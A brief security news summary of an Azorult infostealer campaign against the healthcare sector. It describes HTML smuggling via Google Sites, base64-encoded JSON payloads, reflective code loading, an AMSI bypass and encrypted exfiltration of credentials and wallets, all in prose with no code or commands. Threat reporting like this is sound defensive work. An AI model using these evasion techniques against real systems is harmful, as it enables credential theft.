TLDR:
– Azorult malware campaign uses HTML smuggling via Google Sites to steal login credentials.
– Attackers deliver malicious JSON payload from an external website using reflective code loading and AMSI bypass.
A new evasive Azorult campaign has been identified that utilizes HTML smuggling to deliver a malicious JSON payload from an external website. This campaign targets the healthcare industry and aims to steal sensitive information, including login credentials, crypto wallet data, and browser information. The attackers exploit Google Sites for HTML smuggling attacks, embedding a base64-encoded payload within a separate JSON file hosted on a different domain. When victims visit the website, the malicious payload is downloaded onto their browsers without their knowledge. Reflective code loading and an AMSI bypass are used to evade detection by antivirus software. The Azorult malware, a .NET infostealer, steals sensitive user data such as credentials, browser data, and crypto wallet information. The stolen data is encrypted using Curve25519 cryptography and exfiltrated to the command and control server via HTTP. Sensitive documents are targeted based on file extensions and keywords, and the data is compressed, encrypted, and transmitted securely to the attacker. Overall, this campaign demonstrates the sophisticated techniques used by attackers to steal valuable information from their victims.